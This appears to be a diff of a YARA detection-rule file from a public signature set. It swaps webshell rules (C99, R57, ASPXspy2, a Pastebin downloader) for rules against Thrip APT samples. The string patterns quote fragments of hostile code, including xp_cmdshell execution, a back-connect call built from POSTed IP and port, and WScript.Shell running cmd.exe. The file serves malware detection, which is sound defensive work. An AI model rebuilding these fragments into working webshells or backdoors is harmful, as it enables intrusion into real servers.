+		hash1 = "ac5356ae011effb9d401bf428c92a48cf82c9b61f4c24a29a9718e3379f90f1d"
+		hash2 = "d1c29c2243c511ca3264ad568a6be62f374e104b903eca93debce6691e1c5007"
 
 	strings:
-		$s0 = "Response.Write(\"- Failed to create named pipe:\");" fullword ascii
-		$s1 = "Response.Output.Write(\"+ Sending {0}<br>\", command);" fullword ascii
-		$s2 = "String command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1" ascii
-		$s3 = "Response.Write(\"- Error Getting User Info<br>\");" fullword ascii
-		$s4 = "string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes," fullword ascii
-		$s5 = "[DllImport(\"Advapi32.dll\", SetLastError = true)]" fullword ascii
-		$s9 = "username = DumpAccountSid(tokUser.User.Sid);" fullword ascii
-		$s14 = "//Response.Output.Write(\"Opened process PID: {0} : {1}<br>\", p" ascii
+		$ = "tweakscode.com" wide
+		$ = "www.createmygif.com" wide
+		$ = "www.videownload.com" wide
+		$ = "www.pdfconverterz.com" wide
+		$ = "www.pdfconvertercompare.com" wide
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule SIGNATURE_BASE_Hawkeye_PHP_Panel : FILE
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_1 : FILE
 {
 	meta:
-		description = "Detects HawkEye Keyloggers PHP Panel"
+		description = "Detects sample found in Thrip report by Symantec "
 		author = "Florian Roth (Nextron Systems)"
-		id = "1d185345-6684-538f-954a-45d57a618a7a"
-		date = "2014-12-14"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9133-L9148"
+		id = "5b506069-8185-5dc0-bf64-90646f6bab6b"
+		date = "2018-06-21"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L13-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e29b6df4e3aa3892b10e68218320ac76cecb5a1bbe6c48f2276014b972cbbdd8"
-		score = 60
+		logic_hash = "6e94111abe83aa500bfa35a3a7c2d43c3ed4011bc540401f047e84cfc27204ca"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "59509a17d516813350fe1683ca6b9727bd96dd81ce3435484a5a53b472ff4ae9"
 
 	strings:
-		$s0 = "$fname = $_GET['fname'];" ascii fullword
-		$s1 = "$data = $_GET['data'];" ascii fullword
-		$s2 = "unlink($fname);" ascii fullword
-		$s3 = "echo \"Success\";" fullword ascii
+		$s1 = "idocback.dll" fullword ascii
+		$s2 = "constructor or from DllMain." fullword ascii
+		$s3 = "appmgmt" fullword ascii
+		$s4 = "chksrv" fullword ascii
 
 	condition:
-		all of ( $s* ) and filesize < 600
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_Soaksoak_Infected_Wordpress
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_2 : FILE
 {
 	meta:
-		description = "Detects a SoakSoak infected Wordpress site http://goo.gl/1GzWUX"
+		description = "Detects sample found in Thrip report by Symantec "
 		author = "Florian Roth (Nextron Systems)"
-		id = "d147af65-72de-50be-9435-bef47eb4842a"
-		date = "2014-12-15"
-		modified = "2025-11-03"
-		reference = "http://goo.gl/1GzWUX"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9150-L9165"
+		id = "bc1cfcc8-64a0-5da0-8ff7-147da8a3af0b"
+		date = "2018-06-21"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L31-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4cba18a0d14be2795d71a1973265a1742beda57636f64c1974001ecf70e3e91d"
-		score = 60
+		logic_hash = "ddd3dee11e25ea40fa3cc578c6a836ea850359a5914d5eb5d16ea4340827b91b"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1fc9f7065856cd8dc99b6f46cf0953adf90e2c42a3b65374bf7b50274fb200cc"
 
 	strings:
-		$s0 = "wp_enqueue_script(\"swfobject\");" ascii fullword
-		$s1 = "function FuncQueueObject()" ascii fullword
-		$s2 = "add_action(\"wp_enqueue_scripts\", 'FuncQueueObject');" ascii fullword
+		$s1 = "C:\\WINDOWS\\system32\\sysprep\\cryptbase.dll" fullword ascii
+		$s2 = "ProbeScriptFint" fullword wide
+		$s3 = "C:\\WINDOWS\\system32\\cmd.exe" fullword ascii
 
 	condition:
-		all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
 }
-rule SIGNATURE_BASE_Pastebin_Webshell
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_3 : FILE
 {
 	meta:
-		description = "Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs"
+		description = "Detects sample found in Thrip report by Symantec "
 		author = "Florian Roth (Nextron Systems)"
-		id = "256051ed-da33-52b4-8bfb-ab990648d8fb"
-		date = "2015-01-13"
-		modified = "2025-11-03"
-		reference = "http://goo.gl/7dbyZs"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9167-L9189"
+		id = "67ea7ed1-954f-5b3e-b058-452be3b6fdfa"
+		date = "2018-06-21"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L48-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e71429e9280c37a90ee77be888ae743a86521d3632afc4eeec480b82a22a1445"
-		score = 70
+		logic_hash = "f1617829ccf7da6ee2e9f692fbf1f61d3f1c6a17103db85190d6a8b4fca69328"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0d2abdcaad99e102fdf6574b3dc90f17cb9d060c20e6ac4ff378875d3b91a840"
 
 	strings:
-		$s0 = "file_get_contents(\"http://pastebin.com" ascii
-		$s1 = "xcurl('http://pastebin.com/download.php" ascii
-		$s2 = "xcurl('http://pastebin.com/raw.php" ascii
-		$x0 = "if($content){unlink('evex.php');" ascii
-		$x1 = "$fh2 = fopen(\"evex.php\", 'a');" ascii
-		$y0 = "file_put_contents($pth" ascii
-		$y1 = "echo \"<login_ok>" ascii
-		$y2 = "str_replace('* @package Wordpress',$temp" ascii
+		$s1 = "C:\\Windows\\SysNative\\cmd.exe" fullword ascii
+		$s2 = "C:\\Windows\\SysNative\\sysprep\\cryptbase.dll" fullword ascii
 
 	condition:
-		1 of ( $s* ) or all of ( $x* ) or all of ( $y* )
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
 }
-rule SIGNATURE_BASE_Aspxspy2
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_4 : FILE
 {
 	meta:
-		description = "Web shell - file ASPXspy2.aspx"
+		description = "Detects sample found in Thrip report by Symantec "
 		author = "Florian Roth (Nextron Systems)"
-		id = "b68e0c98-0136-58d8-a2d6-57abccb1e942"
-		date = "2015-01-24"
-		modified = "2025-11-03"
-		reference = "not set"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9191-L9217"
+		id = "9dcfcdbd-d18f-5eba-a10c-95686f010f23"
+		date = "2018-06-21"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L64-L85"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5642387d92139bfe9ae11bfef6bfe0081dcea197"
-		logic_hash = "59c88f8e2542dcde4bf5123147ea2c1ca408925ca966f3f34a4692a3ba7a0935"
+		logic_hash = "f258070054a29cbec0876536d295b85c7bd9f23988d1e0fc2ba58660b0796716"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6b236d3fc54d36e6dc2a26299f6ded597058fed7c9099f1a37716c5e4b162abc"
 
 	strings:
-		$s0 = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=0.0.0.0\\r\\n-PortNo=52521\\r\\n-User=bin" ascii
-		$s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
-		$s3 = "Process[] p=Process.GetProcesses();" fullword ascii
-		$s4 = "Response.Cookies.Add(new HttpCookie(vbhLn,Password));" fullword ascii
-		$s5 = "[DllImport(\"kernel32.dll\",EntryPoint=\"GetDriveTypeA\")]" fullword ascii
-		$s6 = "<p>ConnString : <asp:TextBox id=\"MasR\" style=\"width:70%;margin:0 8px;\" CssCl" ascii
-		$s7 = "ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();" fullword ascii
-		$s8 = "Copyright &copy; 2009 Bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_bla" ascii
-		$s10 = "Response.AddHeader(\"Content-Disposition\",\"attachment;filename=\"+HttpUtility." ascii
-		$s11 = "nxeDR.Command+=new CommandEventHandler(this.iVk);" fullword ascii
-		$s12 = "<%@ import Namespace=\"System.ServiceProcess\"%>" fullword ascii
-		$s13 = "foreach(string innerSubKey in sk.GetSubKeyNames())" fullword ascii
-		$s17 = "Response.Redirect(\"http://www.rootkit.net.cn\");" fullword ascii
-		$s20 = "else if(Reg_Path.StartsWith(\"HKEY_USERS\"))" fullword ascii
+		$s1 = "\\system32\\wbem\\tmf\\caches_version.db" ascii
+		$s2 = "ProcessName No Access" fullword ascii
+		$s3 = "Hwnd of Process NULL" fullword ascii
+		$s4 = "*********The new session is be opening:(%d)**********" fullword ascii
+		$s5 = "[EXECUTE]" fullword ascii
+		$s6 = "/------------------------------------------------------------------------" fullword ascii
+		$s7 = "constructor or from DllMain." fullword ascii
+		$s8 = "Time:%d-%d-%d %d:%d:%d" fullword ascii
+		$s9 = "\\info.config" ascii
 
 	condition:
-		6 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 5 of them
 }
-rule SIGNATURE_BASE_Webshell_27_9_C66_C99 : FILE
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_5 : FILE
 {
 	meta:
-		description = "Detects Webshell - rule generated from from files 27.9.txt, c66.php, c99-shadows-mod.php, c99.php ..."
+		description = "Detects sample found in Thrip report by Symantec "
 		author = "Florian Roth (Nextron Systems)"
-		id = "4b985ae7-1ae6-5976-9e8d-0d6b5faed75b"
-		date = "2016-01-11"
-		modified = "2025-11-03"
-		reference = "https://github.com/nikicat/web-malware-collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9228-L9253"
+		id = "42c56ed6-a509-568f-a611-ce7e5c5d9d8e"
+		date = "2018-06-21"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L87-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "71ae0a3843151a2eec913f62167b23cf9e0c759b18ebe0759174d3503fb23717"
-		score = 70
+		logic_hash = "6f2d4cfd55017ebb34fb6e8ad1b0b46b184926c69d4bacee88dc639771f96792"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
-		hash2 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
-		hash3 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
-		hash4 = "80ec7831ae888d5603ed28d81225ed8b256c831077bb8feb235e0a1a9b68b748"
-		hash5 = "6ce99e07aa98ba6dc521c34cf16fbd89654d0ba59194878dffca857a4c34e57b"
-		hash6 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
-		hash7 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
-		hash8 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
-		hash9 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
-		hash10 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
+		hash1 = "32889639a27961497d53176765b3addf9fff27f1c8cc41634a365085d6d55920"
 
 	strings:
-		$s4 = "if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}" fullword ascii
-		$s6 = "@extract($_REQUEST[\"c99shcook\"]);" fullword ascii
-		$s7 = "if (!function_exists(\"c99_buff_prepare\"))" fullword ascii
+		$s2 = "c:\\windows\\USBEvent.exe" fullword ascii
+		$s5 = "c:\\windows\\spdir.dat" fullword ascii
 
 	condition:
-		filesize < 685KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Acid_Antisecshell_3 : FILE
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_6 : FILE
 {
 	meta:
-		description = "Detects Webshell Acid"
+		description = "Detects sample found in Thrip report by Symantec "
 		author = "Florian Roth (Nextron Systems)"
-		id = "68d59f1e-ef35-586b-805d-1e6e3548d092"
-		date = "2016-01-11"
-		modified = "2025-11-03"
-		reference = "https://github.com/nikicat/web-malware-collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9255-L9287"
+		id = "a1c65bc1-371e-509f-a01c-2d58c1773f95"
+		date = "2018-06-21"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L103-L116"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c8c3fcde7afdafe8ead59e24e432fdd4ccae99f96f67b4be3e5a9cd74ff9b2e7"
-		score = 70
+		logic_hash = "f6cc84ebed26a0dbecfcb3ffb3a11c111ae3d5b40497d59ada518d33bee57fdd"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
-		hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
-		hash3 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
-		hash4 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
-		hash5 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
-		hash6 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
-		hash7 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
-		hash8 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
-		hash9 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
-		hash10 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
-		hash11 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
-		hash12 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
-		hash13 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
-		hash14 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
-		hash15 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
-		hash16 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
-		hash17 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
-		hash18 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
+		hash1 = "44f58496578e55623713c4290abb256d03103e78e99939daeec059776bd79ee2"
 
 	strings:
-		$s0 = "echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">Delete</option>\";" fullword ascii
-		$s1 = "if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}" fullword ascii
+		$s1 = "C:\\Windows\\system32\\Instell.exe" fullword ascii
 
 	condition:
-		filesize < 900KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
 }
-rule SIGNATURE_BASE_Webshell_C99_4 : FILE
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_7 : FILE
 {
 	meta:
-		description = "Detects C99 Webshell"
+		description = "Detects sample found in Thrip report by Symantec "
 		author = "Florian Roth (Nextron Systems)"
-		id = "d5035906-df17-5149-92ae-51e6ec05996e"
-		date = "2016-01-11"
-		modified = "2025-11-03"
-		reference = "https://github.com/nikicat/web-malware-collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9289-L9320"
+		id = "16739590-eb88-5de2-bd76-974b3343ec19"
+		date = "2018-06-21"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L118-L131"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fa095d8da737e24a913eeadaca2882475366bf5cf0911dd9ff44aaa04871cc0f"
-		score = 70
+		logic_hash = "198f8869e56d5549d9195524a86f6557162c5d25b4915bec0bf513797d880ea1"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
-		hash2 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
-		hash3 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
-		hash4 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
-		hash5 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
-		hash6 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
-		hash7 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
-		hash8 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
-		hash9 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
-		hash10 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
-		hash11 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
-		hash12 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
-		hash13 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
-		hash14 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
+		hash1 = "6b714dc1c7e58589374200d2c7f3d820798473faeb26855e53101b8f3c701e3f"
 
 	strings:
-		$s1 = "displaysecinfo(\"List of Attributes\",myshellexec(\"lsattr -a\"));" fullword ascii
-		$s2 = "displaysecinfo(\"RAM\",myshellexec(\"free -m\"));" fullword ascii
-		$s3 = "displaysecinfo(\"Where is perl?\",myshellexec(\"whereis perl\"));" fullword ascii
-		$s4 = "$ret = myshellexec($handler);" fullword ascii
-		$s5 = "if (posix_kill($pid,$sig)) {echo \"OK.\";}" fullword ascii
+		$s1 = "C:\\runme.exe" ascii
 
 	condition:
-		filesize < 900KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and 1 of them
 }
-rule SIGNATURE_BASE_Webshell_R57Shell_2 : FILE
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_8 : FILE
 {
 	meta:
-		description = "Detects Webshell R57"
+		description = "Detects sample found in Thrip report by Symantec "
 		author = "Florian Roth (Nextron Systems)"
-		id = "f2298430-1eff-5ed2-abee-3b26b36d16b7"
-		date = "2016-01-11"
-		modified = "2025-11-03"
-		reference = "https://github.com/nikicat/web-malware-collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9322-L9349"
+		id = "5eb98c9e-5103-5146-9364-d5f24416406f"
+		date = "2018-06-21"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L133-L148"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2af51c3d181801b14d5dbb3107cd78cf7ab4a590b7967f231ec707b7ee03fa26"
-		score = 70
+		logic_hash = "6c8ddc7fb5f3256e57e66f502f6e3c582d82540f773bf4113cac4a685d45f81b"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6"
-		hash2 = "aa957ca4154b7816093d667873cf6bdaded03f820e84d8f1cd5ad75296dd5d4d"
-		hash3 = "aa957ca4154b7816093d667873cf6bdaded03f820e84d8f1cd5ad75296dd5d4d"
-		hash4 = "756b788401aad4bfd4dbafd15c382d98e3ba079390addb5b0cea7ff7f985f881"
-		hash5 = "756b788401aad4bfd4dbafd15c382d98e3ba079390addb5b0cea7ff7f985f881"
-		hash6 = "16b6ec4b80f404f4616e44d8c21978dcdad9f52c84d23ba27660ee8e00984ff2"
-		hash7 = "59105e4623433d5bf93b9e17d72a43a40a4d8ac99e4a703f1d8851ad1276cd88"
-		hash8 = "1db0549066f294f814ec14ba4e9f63d88c4460d68477e5895236173df437d2b8"
-		hash9 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
-		hash10 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
-		hash11 = "59ea6cf16ea06ff47cf0e6a398df2eaec4d329707b8c3201fc63cbf0b7c85519"
-		hash12 = "0e0227a0001b38fb59fc07749e80c9d298ff0e6aca126ea8f4ea68ebc9a3661f"
-		hash13 = "ef74644065925aa8d64913f5f124fe73d8d289d5f019a104bf5f56689f49ba92"
+		hash1 = "0f2d09b1ad0694f9e71eeebec5b2d137665375bf1e76cb4ae4d7f20487394ed3"
 
 	strings:
-		$s1 = "$connection = @ftp_connect($ftp_server,$ftp_port,10);" fullword ascii
-		$s2 = "echo $lang[$language.'_text98'].$suc.\"\\r\\n\";" fullword ascii
+		$x1 = "$.oS.Run('cmd.exe /c '+a+'" fullword ascii
+		$x2 = "new $._x('WScript.Shell');" ascii
+		$x3 = ".ExpandEnvironmentStrings('%Temp%')+unescape('" ascii
 
 	condition:
-		filesize < 900KB and all of them
+		filesize < 10KB and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_Webshell_27_9_Acid_C99_Locus7S : FILE
+
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_9 : FILE
 {
 	meta:
-		description = "Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt"
+		description = "Detects sample found in Thrip report by Symantec "
 		author = "Florian Roth (Nextron Systems)"
-		id = "f5f33b64-b815-5e32-8d2e-5e455651ec5d"
-		date = "2016-01-11"
-		modified = "2025-11-03"
-		reference = "https://github.com/nikicat/web-malware-collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9351-L9373"
+		id = "7fcd8d7f-ed60-5155-a0dd-f3a36f3f2981"
+		date = "2018-06-21"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L150-L170"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3005c09dfcb1f2e33a09ed73e28ef889c74e1f5daf619dd272e0b9b30cdb0f94"
-		score = 70
+		logic_hash = "0500481ae4bb7d4a223a106d2887b994e5000815704e678b2f3ff127a86c22a2"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
-		hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
-		hash3 = "960feb502f913adff6b322bc9815543e5888bbf9058ba0eb46ceb1773ea67668"
-		hash4 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
-		hash5 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
-		hash6 = "5ae121f868555fba112ca2b1a9729d4414e795c39d14af9e599ce1f0e4e445d3"
-		hash7 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
-		hash8 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
-
-	strings:
-		$s0 = "$blah = ex($p2.\" /tmp/back \".$_POST['backconnectip'].\" \".$_POST['backconnectport'].\" &\");" fullword ascii
-		$s1 = "$_POST['backcconnmsge']=\"</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>\";" fullword ascii
+		hash1 = "8e6682bcc51643f02a864b042f7223b157823f3d890fe21d38caeb43500d923e"
+		hash2 = "0c8ca0fd0ec246ef207b96a3aac5e94c9c368504905b0a033f11eef8c62fa14c"
+		hash3 = "6d0a2c822e2bc37cc0cec35f040d3fec5090ef2775df658d3823e47a93a5fef3"
+		hash4 = "0c49d1632eb407b5fd0ce32ed45b1c783ac2ef60d001853ae1f6b7574e08cfa9"
 
 	condition:
-		filesize < 1711KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "a7f0714e82b3105031fa7bc89dfe7664" or pe.imphash ( ) == "8812ff21aeb160e8800257140acae54b" or pe.imphash ( ) == "44a1e904763fe2d0837c747c7061b010" or pe.imphash ( ) == "51a854d285aa12eb82e76e6e1be01573" or pe.imphash ( ) == "a1f457c8c549c5c430556bfe5887a4e6" )
 }
-rule SIGNATURE_BASE_Webshell_Backdoor_PHP_Agent_R57_Mod_Bizzz_Shell_R57 : FILE
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_10 : FILE
 {
 	meta:
-		description = "Detects Webshell - rule generated from from files Backdoor.PHP.Agent.php, r57.mod-bizzz.shell.txt ..."
+		description = "Detects sample found in Thrip report by Symantec "
 		author = "Florian Roth (Nextron Systems)"
-		id = "00d3159c-f5d2-5b49-9499-3bb938776858"
-		date = "2016-01-11"
-		modified = "2025-11-03"
-		reference = "https://github.com/nikicat/web-malware-collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9375-L9400"
+		id = "3307ca18-59fb-5400-b51e-c4f4aa99e592"
+		date = "2018-06-21"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
